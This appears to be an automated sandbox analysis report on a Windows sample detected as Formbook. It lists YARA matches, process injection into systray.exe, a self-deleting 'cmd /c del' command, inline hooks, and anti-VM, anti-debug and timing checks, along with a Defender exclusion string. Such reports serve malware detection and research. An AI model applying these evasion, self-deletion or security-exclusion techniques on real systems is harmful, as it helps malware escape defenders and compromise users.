Source: 1.2.ox87DNNM8d.exe.400dbc8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.ox87DNNM8d.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: ox87DNNM8d.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@4/3

Source: C:\Users\user\Desktop\ox87DNNM8d.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ox87DNNM8d.exe.log

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6876:120:WilError_01

Source: ox87DNNM8d.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ox87DNNM8d.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\ox87DNNM8d.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: Select * from SecurityLogonTypeErro ao listar Banco sql-SecurityLogonType,Select from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)

Source: ox87DNNM8d.exe	Virustotal: Detection: 56%
Source: ox87DNNM8d.exe	Metadefender: Detection: 38%
Source: ox87DNNM8d.exe	ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Users\user\Desktop\ox87DNNM8d.exe 'C:\Users\user\Desktop\ox87DNNM8d.exe'
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process created: C:\Users\user\Desktop\ox87DNNM8d.exe C:\Users\user\Desktop\ox87DNNM8d.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ox87DNNM8d.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process created: C:\Users\user\Desktop\ox87DNNM8d.exe C:\Users\user\Desktop\ox87DNNM8d.exe	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\ox87DNNM8d.exe'	Jump to behavior

Source: C:\Users\user\Desktop\ox87DNNM8d.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: ox87DNNM8d.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ox87DNNM8d.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: systray.pdb source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp
Source:	Binary string: systray.pdbGCTL source: ox87DNNM8d.exe, 00000003.00000002.281473750.0000000001808000.00000004.00000020.sdmp
Source:	Binary string: wntdll.pdbUGP source: ox87DNNM8d.exe, 00000003.00000003.233330947.0000000001900000.00000004.00000001.sdmp, systray.exe, 00000008.00000003.282590732.0000000000CC0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: ox87DNNM8d.exe, 00000003.00000003.233330947.0000000001900000.00000004.00000001.sdmp, systray.exe

Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_00B5CFB8 push edx; ret	1_2_00B5CFF4
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_00B5C8C0 push eax; retf	1_2_00B5C861
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_00B5DBCA push eax; retf	1_2_00B5DB6B
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_00B5D21C push eax; retf	1_2_00B5D1BD
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_00B5D966 push edx; ret	1_2_00B5D9A2
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_00B5C65C push edx; ret	1_2_00B5C698
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_0642674D push es; ret	1_2_06426754
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 1_2_06426799 push es; ret	1_2_0642679C
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00401028 push ds; ret	3_2_0040102C
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_004171DE push 974CB969h; retf	3_2_004171E6
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_004172CC push edx; ret	3_2_004172D8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00416BC9 push es; retf	3_2_00416BDC
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_004163B0 push ss; ret	3_2_004163C6
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_0041CEF2 push eax; ret	3_2_0041CEF8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_0041CEFB push eax; ret	3_2_0041CF62
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_0041CEA5 push eax; ret	3_2_0041CEF8
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_0041CF5C push eax; ret	3_2_0041CF62
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00FBC8C0 push eax; retf	3_2_00FBC861
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00FBD966 push edx; ret	3_2_00FBD9A2
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00FBD21C push eax; retf	3_2_00FBD1BD
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00FBDBCA push eax; retf	3_2_00FBDB6B
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00FBC65C push edx; ret	3_2_00FBC698
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Code function: 3_2_00FBCFB8 push edx; ret	3_2_00FBCFF4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045ED0D1 push ecx; ret	8_2_045ED0E4
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_001871DE push 974CB969h; retf	8_2_001871E6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_001872CC push edx; ret	8_2_001872D8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_001863B0 push ss; ret	8_2_001863C6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_00186BC9 push es; retf	8_2_00186BDC
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0018CEA5 push eax; ret	8_2_0018CEF8
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0018CEFB push eax; ret	8_2_0018CF62
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0018CEF2 push eax; ret	8_2_0018CEF8

Source: initial sample

Static PE information: section name: .text entropy: 7.93204508639

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)

Show sources

Source: explorer.exe

User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xEC

Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ox87DNNM8d.exe PID: 4368, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\ox87DNNM8d.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	RDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 00000000001798E4 second address: 00000000001798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\systray.exe	RDTSC instruction interceptor: First address: 0000000000179B4E second address: 0000000000179B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\ox87DNNM8d.exe

Code function: 3_2_00409A80 rdtsc

3_2_00409A80

Source: C:\Users\user\Desktop\ox87DNNM8d.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\ox87DNNM8d.exe TID: 5636	Thread sleep time: -101791s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe TID: 5984	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2268	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2268	Thread sleep time: -68000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe TID: 6548	Thread sleep time: -70000s >= -30000s	Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Thread delayed: delay time: 101791			Jump to behavior
Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: explorer.exe, 00000004.00000000.262437256.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000004.00000000.262437256.000000000891C000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.261614282.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 00000004.00000000.241045393.000000000374F000.00000004.00000001.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000004.00000002.501948287.0000000003767000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000004.00000000.241045393.000000000374F000.00000004.00000001.sdmp	Binary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 00000004.00000000.237589481.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000004.00000000.262499042.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000004.00000000.262499042.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: 6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}##
Source: explorer.exe, 00000004.00000002.508140093.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000004.00000000.261614282.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000004.00000000.261614282.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000004.00000000.262499042.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: ox87DNNM8d.exe, 00000001.00000002.234229050.0000000002FC7000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000004.00000000.261614282.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\ox87DNNM8d.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\ox87DNNM8d.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\ox87DNNM8d.exe

Code function: 3_2_00409A80 rdtsc

3_2_00409A80

Source: C:\Users\user\Desktop\ox87DNNM8d.exe

Code function: 3_2_0040ACC0 LdrLoadDll,

3_2_0040ACC0

Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04661074 mov eax, dword ptr fs:[00000030h]	8_2_04661074
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04652073 mov eax, dword ptr fs:[00000030h]	8_2_04652073
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0462C450 mov eax, dword ptr fs:[00000030h]	8_2_0462C450
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0462C450 mov eax, dword ptr fs:[00000030h]	8_2_0462C450
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045B746D mov eax, dword ptr fs:[00000030h]	8_2_045B746D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h]	8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h]	8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h]	8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h]	8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h]	8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h]	8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h]	8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h]	8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h]	8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h]	8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h]	8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h]	8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h]	8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04651C06 mov eax, dword ptr fs:[00000030h]	8_2_04651C06
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0466740D mov eax, dword ptr fs:[00000030h]	8_2_0466740D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0466740D mov eax, dword ptr fs:[00000030h]	8_2_0466740D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0466740D mov eax, dword ptr fs:[00000030h]	8_2_0466740D
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045AB02A mov eax, dword ptr fs:[00000030h]	8_2_045AB02A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045AB02A mov eax, dword ptr fs:[00000030h]	8_2_045AB02A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045AB02A mov eax, dword ptr fs:[00000030h]	8_2_045AB02A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045AB02A mov eax, dword ptr fs:[00000030h]	8_2_045AB02A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045CBC2C mov eax, dword ptr fs:[00000030h]	8_2_045CBC2C
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04664015 mov eax, dword ptr fs:[00000030h]	8_2_04664015
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04664015 mov eax, dword ptr fs:[00000030h]	8_2_04664015
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04617016 mov eax, dword ptr fs:[00000030h]	8_2_04617016
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04617016 mov eax, dword ptr fs:[00000030h]	8_2_04617016
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04617016 mov eax, dword ptr fs:[00000030h]	8_2_04617016
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_046514FB mov eax, dword ptr fs:[00000030h]	8_2_046514FB
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04668CD6 mov eax, dword ptr fs:[00000030h]	8_2_04668CD6
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04599080 mov eax, dword ptr fs:[00000030h]	8_2_04599080
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045CF0BF mov ecx, dword ptr fs:[00000030h]	8_2_045CF0BF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045CF0BF mov eax, dword ptr fs:[00000030h]	8_2_045CF0BF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045CF0BF mov eax, dword ptr fs:[00000030h]	8_2_045CF0BF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04613884 mov eax, dword ptr fs:[00000030h]	8_2_04613884
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04613884 mov eax, dword ptr fs:[00000030h]	8_2_04613884
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D90AF mov eax, dword ptr fs:[00000030h]	8_2_045D90AF
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045B7D50 mov eax, dword ptr fs:[00000030h]	8_2_045B7D50
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045D3D43 mov eax, dword ptr fs:[00000030h]	8_2_045D3D43
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045BB944 mov eax, dword ptr fs:[00000030h]	8_2_045BB944
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045BB944 mov eax, dword ptr fs:[00000030h]	8_2_045BB944
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04613540 mov eax, dword ptr fs:[00000030h]	8_2_04613540
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0459B171 mov eax, dword ptr fs:[00000030h]	8_2_0459B171
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_0459B171 mov eax, dword ptr fs:[00000030h]	8_2_0459B171
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045BC577 mov eax, dword ptr fs:[00000030h]	8_2_045BC577
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045BC577 mov eax, dword ptr fs:[00000030h]	8_2_045BC577
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04668D34 mov eax, dword ptr fs:[00000030h]	8_2_04668D34
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04599100 mov eax, dword ptr fs:[00000030h]	8_2_04599100
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04599100 mov eax, dword ptr fs:[00000030h]	8_2_04599100
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_04599100 mov eax, dword ptr fs:[00000030h]	8_2_04599100
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045C513A mov eax, dword ptr fs:[00000030h]	8_2_045C513A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045C513A mov eax, dword ptr fs:[00000030h]	8_2_045C513A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045C4D3B mov eax, dword ptr fs:[00000030h]	8_2_045C4D3B
Source: C:\Windows\SysWOW64\systray.exe	Code function: 8_2_045C4D3B mov eax, dword ptr fs:[00000030h]	8_2_045C4D3B
